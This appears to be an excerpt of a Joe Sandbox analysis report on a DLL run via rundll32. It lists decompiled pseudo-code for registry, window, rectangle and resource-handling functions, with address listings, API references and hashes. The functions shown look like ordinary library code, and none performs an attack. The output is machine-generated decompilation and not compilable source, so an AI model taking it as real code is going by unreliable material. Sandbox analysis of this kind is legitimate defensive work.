                                                                                                            • SetRectEmpty.USER32(?), ref: 1002C798
                                                                                                            • GetSystemMetrics.USER32 ref: 1002C7D0
                                                                                                              • Part of subcall function 1000866D: SelectObject.GDI32(?,?), ref: 1000867C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Metrics$EmptyH_prologMessageObjectRectSelectSendSystemText
                                                                                                            • String ID:
                                                                                                            • API String ID: 1847300772-0
                                                                                                            • Opcode ID: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction ID: 7e47f88f2f58757794e6d6d0f1f8ec1525fff8c624cfc69816e05b16ce6d54a2
                                                                                                            • Opcode Fuzzy Hash: a53167acf3a51f034ce5f4da467e19f98442e21dd7736e4da97a4f82dd2fe8b4
                                                                                                            • Instruction Fuzzy Hash: 67217936A00218AFDB15DFA8DC89CEEBBB9FF88700F414529F512A7291DB717945CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10034B35 Relevance: 6.1, APIs: 4, Instructions: 71registryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E10034B35(intOrPtr __ecx) {
				void* _v8;
				char _v12;
				int _v16;
				intOrPtr _v20;
				int _v24;
				char* _t32;
				intOrPtr _t34;
				char** _t35;
				signed int _t40;
				char** _t44;
				char* _t46;

				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				_t46 =  *0x1004b390; // 0x1003d660
				_v20 = __ecx;
				_v8 = 0;
				_v12 = 0;
				_v24 = 4;
				_v16 = 0;
				_t35 = 0x1004b390;
				if(_t46 == 0) {
					L13:
					RegCloseKey(0);
					return 1;
				}
				do {
					if(RegOpenKeyExA(0x80000001,  *_t35, 0, 1,  &_v8) != 0) {
						goto L11;
					}
					_t8 =  &(_t35[1]); // 0x1004b358
					_t44 =  *_t8;
					while(1) {
						_t32 =  *_t44;
						if(_t32 == 0) {
							goto L11;
						}
						if(RegQueryValueExA(_v8, _t32, 0,  &_v16,  &_v12,  &_v24) == 0 && _v16 == 4) {
							_t34 = _v20;
							_t16 =  &(_t44[1]); // 0x1
							_t40 =  *_t16;
							if(_v12 == 0) {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) &  !_t40;
							} else {
								 *(_t34 + 0x9c) =  *(_t34 + 0x9c) | _t40;
							}
						}
						_v12 = 0;
						_v24 = 4;
						_v16 = 0;
						_t44 =  &(_t44[2]);
					}
					L11:
					RegCloseKey(_v8);
					_t35 =  &(_t35[2]);
					_v8 = 0;
				} while ( *_t35 != 0);
				goto L13;
			}














                                                                                                            0x10034b3f
                                                                                                            0x10034b45
                                                                                                            0x10034b4b
                                                                                                            0x10034b4e
                                                                                                            0x10034b51
                                                                                                            0x10034b54
                                                                                                            0x10034b5b
                                                                                                            0x10034b5e
                                                                                                            0x10034b63
                                                                                                            0x10034bf1
                                                                                                            0x10034bf2
                                                                                                            0x10034bfe
                                                                                                            0x10034bfe
                                                                                                            0x10034b6a
                                                                                                            0x10034b80
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034b82
                                                                                                            0x10034b82
                                                                                                            0x10034bd3
                                                                                                            0x10034bd3
                                                                                                            0x10034bd7
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10034ba0
                                                                                                            0x10034bab
                                                                                                            0x10034bae
                                                                                                            0x10034bae
                                                                                                            0x10034bb1
                                                                                                            0x10034bbd
                                                                                                            0x10034bb3
                                                                                                            0x10034bb3
                                                                                                            0x10034bb3
                                                                                                            0x10034bb1
                                                                                                            0x10034bc3
                                                                                                            0x10034bc6
                                                                                                            0x10034bcd
                                                                                                            0x10034bd0
                                                                                                            0x10034bd0
                                                                                                            0x10034bd9
                                                                                                            0x10034bdc
                                                                                                            0x10034be2
                                                                                                            0x10034be7
                                                                                                            0x10034be7
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,1004B390,00000000,00000001,?), ref: 10034B78
                                                                                                            • RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,00000004), ref: 10034B98
                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 10034BDC
                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 10034BF2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Close$OpenQueryValue
                                                                                                            • String ID:
                                                                                                            • API String ID: 1607946009-0
                                                                                                            • Opcode ID: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction ID: c59a5bb59059241ef396f1e8f67c70b524d6e5c214a839477bb571e1d0f0587e
                                                                                                            • Opcode Fuzzy Hash: 9a8edc8e7e8c630006c35e1cb287b5a1c5b92324269ffeb4073756e8a178cadc
                                                                                                            • Instruction Fuzzy Hash: 86212CB5D00259EFDB06CF96C985EAEFBF8EF80355F1240AAE405AA151D770AA00CF21
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000D0B9 Relevance: 6.1, APIs: 4, Instructions: 66COMMONLIBRARYCODE
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 37%
                                                                                                            			E1000D0B9(signed int _a4, signed int* _a8, intOrPtr _a12) {
				void* _t14;
				signed int _t16;
				signed int _t17;
				signed int _t18;
				signed int _t20;
				signed int _t23;
				signed int* _t31;

				_t31 = _a8;
				if(_t31 == 0) {
					return _t14;
				}
				_t23 = _a4;
				if((_t23 & 0x00000020) == 0) {
					_t16 = (_t23 & 0x0000ffff) - 8;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#6( *_t31);
						L16:
						 *_t31 =  *_t31 & 0x00000000;
						L17:
						if((_t23 & 0x00000010) != 0 &&  !(_t23 & 0x00004000) != 0) {
							__imp__CoTaskMemFree(_t31[1]);
						}
						return _t16;
					}
					_t17 = _t16 - 1;
					__eflags = _t17;
					if(_t17 == 0) {
						L13:
						_t16 =  *_t31;
						__eflags = _t16;
						if(_t16 == 0) {
							goto L17;
						}
						_t16 =  *((intOrPtr*)( *_t16 + 8))(_t16);
						goto L16;
					}
					_t16 = _t17 - 3;
					__eflags = _t16;
					if(_t16 == 0) {
						__imp__#9(_t31);
						goto L17;
					}
					_t18 = _t16 - 1;
					__eflags = _t18;
					if(_t18 == 0) {
						goto L13;
					}
					_t16 = _t18 - 0x7b;
					__eflags = _t16;
					if(__eflags == 0) {
						E1000D03C( &_a8, __eflags, _a12);
						_t20 = _a8;
						__eflags = _t20;
						if(_t20 != 0) {
							 *((intOrPtr*)( *_t20 + 0x10))(_t20,  *_t31, 0);
						}
						_t16 = L1000C8E6( &_a8);
					}
					goto L17;
				}
				_t16 =  *_t31;
				if(_t16 == 0) {
					goto L17;
				}
				__imp__#16(_t16);
				goto L16;
			}










                                                                                                            0x1000d0bd
                                                                                                            0x1000d0c2
                                                                                                            0x1000d15d
                                                                                                            0x1000d15d
                                                                                                            0x1000d0c9
                                                                                                            0x1000d0cf
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e3
                                                                                                            0x1000d0e6
                                                                                                            0x1000d137
                                                                                                            0x1000d13d
                                                                                                            0x1000d13d
                                                                                                            0x1000d140
                                                                                                            0x1000d143
                                                                                                            0x1000d154
                                                                                                            0x1000d154
                                                                                                            0x00000000
                                                                                                            0x1000d15a
                                                                                                            0x1000d0e8
                                                                                                            0x1000d0e8
                                                                                                            0x1000d0e9
                                                                                                            0x1000d127
                                                                                                            0x1000d127
                                                                                                            0x1000d129
                                                                                                            0x1000d12b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d130
                                                                                                            0x00000000
                                                                                                            0x1000d130
                                                                                                            0x1000d0eb
                                                                                                            0x1000d0eb
                                                                                                            0x1000d0ee
                                                                                                            0x1000d11f
                                                                                                            0x00000000
                                                                                                            0x1000d11f
                                                                                                            0x1000d0f0
                                                                                                            0x1000d0f0
                                                                                                            0x1000d0f1
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0f3
                                                                                                            0x1000d0f3
                                                                                                            0x1000d0f6
                                                                                                            0x1000d0fe
                                                                                                            0x1000d103
                                                                                                            0x1000d106
                                                                                                            0x1000d108
                                                                                                            0x1000d111
                                                                                                            0x1000d111
                                                                                                            0x1000d117
                                                                                                            0x1000d117
                                                                                                            0x00000000
                                                                                                            0x1000d0f6
                                                                                                            0x1000d0d1
                                                                                                            0x1000d0d5
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1000d0d8
                                                                                                            0x00000000

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArrayDestroyFreeSafeTask
                                                                                                            • String ID:
                                                                                                            • API String ID: 3253174383-0
                                                                                                            • Opcode ID: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction ID: d5df2e689e9d8d1315e3bdacc16dfbb058a5afc5faf3f73fb235713c606ee203
                                                                                                            • Opcode Fuzzy Hash: e8ad03aeafd3d0ea856f226044b8eb18344ba6786890ac13f09cc67cb798247f
                                                                                                            • Instruction Fuzzy Hash: E711563010020ABBFB55EF66DC84BEE77A8EF457D0F10441AFA858A198CF35EA00CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1000C037 Relevance: 6.1, APIs: 4, Instructions: 65COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 64%
                                                                                                            			E1000C037(void* __edi) {
				int _t36;
				void* _t52;
				intOrPtr* _t55;
				void* _t56;
				void* _t58;

				E10011BF0(0x1003aec3, _t58);
				 *((intOrPtr*)(_t58 - 0x10)) = 0;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x10040668;
				_t55 =  *((intOrPtr*)(_t58 + 8));
				 *(_t58 - 4) = 0;
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					_push( *((intOrPtr*)(_t58 + 0xc)));
					_t52 = E1002934F();
					GetRgnBox( *(_t52 + 4), _t58 - 0x24);
					IntersectRect(_t58 - 0x34, _t58 - 0x24, _t55 - 0x9c);
					_t36 = EqualRect(_t58 - 0x34, _t58 - 0x24);
					_push( *((intOrPtr*)(_t58 + 0x10)));
					if(_t36 != 0) {
						_push(_t52);
						E1000B505( *((intOrPtr*)( *((intOrPtr*)(_t55 - 0xac)) + 0x1c)));
						_t56 = 0;
					} else {
						_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0);
					}
				} else {
					_t56 =  *((intOrPtr*)( *_t55 + 0x64))(_t55, 0,  *((intOrPtr*)(_t58 + 0x10)));
				}
				 *(_t58 - 4) =  *(_t58 - 4) | 0xffffffff;
				 *((intOrPtr*)(_t58 - 0x14)) = 0x1003eb6c;
				E100293B4(_t58 - 0x14);
				 *[fs:0x0] =  *((intOrPtr*)(_t58 - 0xc));
				return _t56;
			}








                                                                                                            0x1000c03c
                                                                                                            0x1000c048
                                                                                                            0x1000c04b
                                                                                                            0x1000c055
                                                                                                            0x1000c058
                                                                                                            0x1000c05b
                                                                                                            0x1000c06c
                                                                                                            0x1000c074
                                                                                                            0x1000c07d
                                                                                                            0x1000c092
                                                                                                            0x1000c0a0
                                                                                                            0x1000c0a8
                                                                                                            0x1000c0ab
                                                                                                            0x1000c0c1
                                                                                                            0x1000c0c2
                                                                                                            0x1000c0c7
                                                                                                            0x1000c0ad
                                                                                                            0x1000c0b4
                                                                                                            0x1000c0b4
                                                                                                            0x1000c05d
                                                                                                            0x1000c067
                                                                                                            0x1000c067
                                                                                                            0x1000c0ca
                                                                                                            0x1000c0d1
                                                                                                            0x1000c0d8
                                                                                                            0x1000c0e4
                                                                                                            0x1000c0ec

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Rect$EqualH_prologIntersect
                                                                                                            • String ID:
                                                                                                            • API String ID: 2227276553-0
                                                                                                            • Opcode ID: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction ID: 4a10622ef6c9ad6aa885a1ca4e3b79ad8472db7afe28fedb0a7e7fe58967940e
                                                                                                            • Opcode Fuzzy Hash: 78599ba6039fb6f2ff74285b4e7690d6ab97fe85a90664b5396fc8c378847134
                                                                                                            • Instruction Fuzzy Hash: 19210B7290025DEFDB11DFA4C984D9EBBB8FF08291B11466AF906E7250D731AE11CF61
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 100306DB Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 86%
                                                                                                            			E100306DB(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				int _v8;
				int _t21;
				intOrPtr _t35;
				int _t39;
				void* _t49;

				_push(__ecx);
				_push(__ecx);
				_t49 = __ecx;
				_t39 = _a4 -  *((intOrPtr*)(__ecx + 4));
				_t21 = _a8 -  *((intOrPtr*)(__ecx + 8));
				_v8 = _t21;
				OffsetRect(__ecx + 0x28, _t39, _t21);
				OffsetRect(_t49 + 0x48, _t39, _v8);
				OffsetRect(_t49 + 0x38, _t39, _v8);
				OffsetRect(_t49 + 0x58, _t39, _v8);
				_t51 =  *((intOrPtr*)(_t49 + 0x80));
				 *((intOrPtr*)(_t49 + 4)) = _a4;
				 *((intOrPtr*)(_t49 + 8)) = _a8;
				if( *((intOrPtr*)(_t49 + 0x80)) == 0) {
					_t35 = E100301DC();
				} else {
					_t35 = 0;
				}
				 *((intOrPtr*)(_t49 + 0x74)) = _t35;
				return E10030582(_t49, _t51, 0);
			}








                                                                                                            0x100306de
                                                                                                            0x100306df
                                                                                                            0x100306e5
                                                                                                            0x100306ed
                                                                                                            0x100306f9
                                                                                                            0x100306fc
                                                                                                            0x10030704
                                                                                                            0x1003070f
                                                                                                            0x1003071a
                                                                                                            0x10030725
                                                                                                            0x10030727
                                                                                                            0x10030731
                                                                                                            0x10030737
                                                                                                            0x1003073a
                                                                                                            0x10030742
                                                                                                            0x1003073c
                                                                                                            0x1003073c
                                                                                                            0x1003073c
                                                                                                            0x1003074b
                                                                                                            0x10030757

                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: OffsetRect
                                                                                                            • String ID:
                                                                                                            • API String ID: 177026234-0
                                                                                                            • Opcode ID: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction ID: 422a5061f760cbc8c05fd093b4a9fb31e1b7e654ec4c61e66631bb08b1bca8e5
                                                                                                            • Opcode Fuzzy Hash: beee98248f834fb6aab91ac6ff05766e8fc6b9e8229c4719242bff28fb5fbeb9
                                                                                                            • Instruction Fuzzy Hash: 3D110CB6600608BFD711DFEDC994DABB7ECEF48210F00882AF54AD7610E670FA408B60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001EFFC Relevance: 6.1, APIs: 4, Instructions: 57COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001EFFC(void* __ecx) {
				void* _v8;
				signed short _t23;
				void* _t30;
				struct HINSTANCE__* _t32;
				signed short _t34;
				void* _t36;
				signed short* _t39;
				signed short _t41;

				_push(__ecx);
				_t36 = __ecx;
				_t39 =  *(__ecx + 0x5c);
				_v8 =  *((intOrPtr*)(__ecx + 0x58));
				if( *((intOrPtr*)(__ecx + 0x54)) != 0) {
					_t32 =  *(E100373B5() + 0xc);
					_v8 = LoadResource(_t32, FindResourceA(_t32,  *(_t36 + 0x54), 5));
				}
				if(_v8 != 0) {
					_t39 = LockResource(_v8);
				}
				_t30 = 1;
				if(_t39 != 0) {
					_t34 =  *_t39;
					if(_t39[1] != 0xffff) {
						_t23 = _t39[5];
						_t41 = _t39[6];
					} else {
						_t34 = _t39[6];
						_t23 = _t39[9];
						_t41 = _t39[0xa];
					}
					if((_t34 & 0x00001801) != 0 || _t23 != 0 || _t41 != 0) {
						_t30 = 0;
					}
				}
				if( *(_t36 + 0x54) != 0) {
					FreeResource(_v8);
				}
				return _t30;
			}











                                                                                                            0x1001efff
                                                                                                            0x1001f003
                                                                                                            0x1001f00c
                                                                                                            0x1001f00f
                                                                                                            0x1001f012
                                                                                                            0x1001f019
                                                                                                            0x1001f030
                                                                                                            0x1001f030
                                                                                                            0x1001f037
                                                                                                            0x1001f042
                                                                                                            0x1001f042
                                                                                                            0x1001f046
                                                                                                            0x1001f049
                                                                                                            0x1001f051
                                                                                                            0x1001f053
                                                                                                            0x1001f062
                                                                                                            0x1001f066
                                                                                                            0x1001f055
                                                                                                            0x1001f055
                                                                                                            0x1001f058
                                                                                                            0x1001f05c
                                                                                                            0x1001f05c
                                                                                                            0x1001f06f
                                                                                                            0x1001f07b
                                                                                                            0x1001f07b
                                                                                                            0x1001f06f
                                                                                                            0x1001f081
                                                                                                            0x1001f086
                                                                                                            0x1001f086
                                                                                                            0x1001f092

                                                                                                            APIs
                                                                                                            • FindResourceA.KERNEL32(?,00000000,00000005), ref: 1001F022
                                                                                                            • LoadResource.KERNEL32(?,00000000), ref: 1001F02A
                                                                                                            • LockResource.KERNEL32(00000000), ref: 1001F03C
                                                                                                            • FreeResource.KERNEL32(00000000), ref: 1001F086
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Resource$FindFreeLoadLock
                                                                                                            • String ID:
                                                                                                            • API String ID: 1078018258-0
                                                                                                            • Opcode ID: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction ID: f62bb37731aceb1cfac18bd5f8f11ebe971a113ae325be4be6212f910cba7098
                                                                                                            • Opcode Fuzzy Hash: 64b13492dfaf21cbbf07bee8131a48b852f4c6a235dda3ed0121460069c880f2
                                                                                                            • Instruction Fuzzy Hash: 8711E73A500715EFD722EFA1C988AABB7B4FF18794F00815CE8429B652D770EC84CB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 1001D8A6 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 94%
                                                                                                            			E1001D8A6(void* __ecx, struct tagPOINT* _a8) {
				struct tagPOINT _v12;
				struct tagPOINT* _t8;
				struct HWND__* _t9;
				int _t14;
				long _t18;
				struct HWND__* _t20;
				struct HWND__* _t21;
				struct HWND__* _t24;

				_t8 = _a8;
				_v12.x = _t8->x;
				_t18 = _t8->y;
				_push(_t18);
				_v12.y = _t18;
				_t9 = WindowFromPoint( *_t8);
				_t24 = _t9;
				if(_t24 != 0) {
					_t20 = GetParent(_t24);
					if(_t20 == 0 || E10029A8E(_t20, 2) == 0) {
						ScreenToClient(_t24,  &_v12);
						_t21 = E10029C98(_t24, _v12.x, _v12.y);
						if(_t21 == 0) {
							L6:
							_t9 = _t24;
						} else {
							_t14 = IsWindowEnabled(_t21);
							_t9 = _t21;
							if(_t14 != 0) {
								goto L6;
							}
						}
					} else {
						_t9 = _t20;
					}
				}
				return _t9;
			}











                                                                                                            0x1001d8ab
                                                                                                            0x1001d8b1
                                                                                                            0x1001d8b4
                                                                                                            0x1001d8b7
                                                                                                            0x1001d8ba
                                                                                                            0x1001d8bd
                                                                                                            0x1001d8c3
                                                                                                            0x1001d8c7
                                                                                                            0x1001d8d1
                                                                                                            0x1001d8d5
                                                                                                            0x1001d8ec
                                                                                                            0x1001d8fe
                                                                                                            0x1001d902
                                                                                                            0x1001d911
                                                                                                            0x1001d911
                                                                                                            0x1001d904
                                                                                                            0x1001d905
                                                                                                            0x1001d90d
                                                                                                            0x1001d90f
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x1001d90f
                                                                                                            0x1001d8e3
                                                                                                            0x1001d8e3
                                                                                                            0x1001d8e3
                                                                                                            0x1001d913
                                                                                                            0x1001d916

                                                                                                            APIs
                                                                                                            • WindowFromPoint.USER32(?,?), ref: 1001D8BD
                                                                                                            • GetParent.USER32(00000000), ref: 1001D8CB
                                                                                                            • ScreenToClient.USER32 ref: 1001D8EC
                                                                                                            • IsWindowEnabled.USER32(00000000), ref: 1001D905
                                                                                                              • Part of subcall function 10029A8E: GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$ClientEnabledFromLongParentPointScreen
                                                                                                            • String ID:
                                                                                                            • API String ID: 2204725058-0
                                                                                                            • Opcode ID: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction ID: b169f4ebd7b1781a2425983f4991e3855304b76673034f1eafd2744fb62dc6a9
                                                                                                            • Opcode Fuzzy Hash: 203580147984b863afd1059a40c53a8fb6a82f7499a9f31233211a8b075018b0
                                                                                                            • Instruction Fuzzy Hash: D3014F3A600615BFDB12FB59CC44DAE7BB9EF89690B11416AF901DB211EB30DE40DB60
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 10022B16 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10022B16(struct HWND__* _a4, int _a8, int _a12, long _a16, intOrPtr _a20, intOrPtr _a24) {
				void* __ebp;
				struct HWND__* _t16;
				void* _t20;
				struct HWND__* _t23;

				_t16 = GetTopWindow(_a4);
				while(1) {
					_t23 = _t16;
					if(_t23 == 0) {
						break;
					}
					if(_a24 == 0) {
						SendMessageA(_t23, _a8, _a12, _a16);
					} else {
						_push(_t23);
						_t20 = E10022115();
						if(_t20 != 0) {
							_push(_a16);
							_push(_a12);
							_push(_a8);
							_push( *((intOrPtr*)(_t20 + 0x1c)));
							_push(_t20);
							E1002283F();
						}
					}
					if(_a20 != 0 && GetTopWindow(_t23) != 0) {
						E10022B16(_t23, _a8, _a12, _a16, _a20, _a24);
					}
					_t16 = GetWindow(_t23, 2);
				}
				return _t16;
			}







                                                                                                            0x10022b24
                                                                                                            0x10022b87
                                                                                                            0x10022b87
                                                                                                            0x10022b8b
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x10022b2c
                                                                                                            0x10022b56
                                                                                                            0x10022b2e
                                                                                                            0x10022b2e
                                                                                                            0x10022b2f
                                                                                                            0x10022b36
                                                                                                            0x10022b38
                                                                                                            0x10022b3b
                                                                                                            0x10022b3e
                                                                                                            0x10022b41
                                                                                                            0x10022b44
                                                                                                            0x10022b45
                                                                                                            0x10022b45
                                                                                                            0x10022b36
                                                                                                            0x10022b60
                                                                                                            0x10022b79
                                                                                                            0x10022b79
                                                                                                            0x10022b81
                                                                                                            0x10022b81
                                                                                                            0x10022b90

                                                                                                            APIs
                                                                                                            • GetTopWindow.USER32(?), ref: 10022B24
                                                                                                            • GetTopWindow.USER32(00000000), ref: 10022B63
                                                                                                            • GetWindow.USER32(00000000,00000002), ref: 10022B81
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000003.00000002.384654975.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000003.00000002.384632464.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.384975007.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385031155.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.385088253.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            • Associated: 00000003.00000002.386149273.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
